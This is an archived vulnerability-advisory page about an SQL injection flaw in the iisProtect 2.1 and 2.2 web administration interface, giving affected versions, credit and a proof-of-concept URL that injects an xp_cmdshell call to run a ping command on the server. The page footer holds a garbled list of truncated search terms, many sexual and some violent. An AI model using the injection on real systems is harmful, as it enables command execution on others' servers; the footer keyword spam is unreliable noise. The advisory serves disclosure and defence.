about advertise contact
Search: Home Vulnerabilities Exploits News Articles RSS Feeds Archive Talk

exploits , vulnerabilities , articles , IISProtect Web Administration Interface SQL Injection Vulnerability


Title IISProtect Web Administration Interface SQL Injection Vulnerability
Published 2003-05-23-12:00AM
Updated 2003-05-23-10:07PM
Class Input Validation Error
CVE   CVE-MAP-NOMATCH
Remote  Yes
Local  No
Credit  Discovery is credited to Gyrniff <frohn@superbruger.dk>.
Vulnerable  iisProtect iisProtect 2.2
iisProtect iisProtect 2.1
Not Vulnerable  
Code   The following example was provided:

http://www.example.com/iisprotect/admin/SiteAdmin.ASP?V_SiteName=&V_FirstTab=Groups&V_SecondTab=All&GroupName=gyrniff_gr';exec%20maste
r..xp_cmdshell'ping%2010.10.10.11';--

This example invokes the 'xp_cmdshell' stored procedure to execute the ping command on the host operating system.
TXT  t3xt 1t!


Advertising

Copyright 2007, SecurityDot
Fri, 05 Dec 2008 16:53:16 +0000

Friends : milw0rm.com , secunia.com , securityfocus.com
GOOGLE
NEWS EXPLOITS VULNS
exploits , 0day exploits , newest exploits , vulnerabilities , newest vulnerabilities , 0day vulnerabilities , newest articles , linux articles , articles
cyberw t627t www.asin4y optics 4.1 viaeo sex- www.sekpor t932t DNS POISON /rape vedi www.Sex45. www.waptri WWW.SEXOCE ball www.tamilh Animal sex wwwsexymov chba+mamai Home sex /search/ex SExy video Hentai Guy SEXEY VEDI ttp:/rapid Www.phoner news+for+C LOCAL IMEG t243t sex poren Ja+rule+ sexy girl Naruto mov sexy anima www.tamilh Hindi+sex+ local shel joomla.htm loca Sex Video www.tiens. /search/ex t809 t www.juliap php-nuke 2 CMS is Fre ibp+2..7 sqwebmail Trisha bat news for c www.banbus Mybb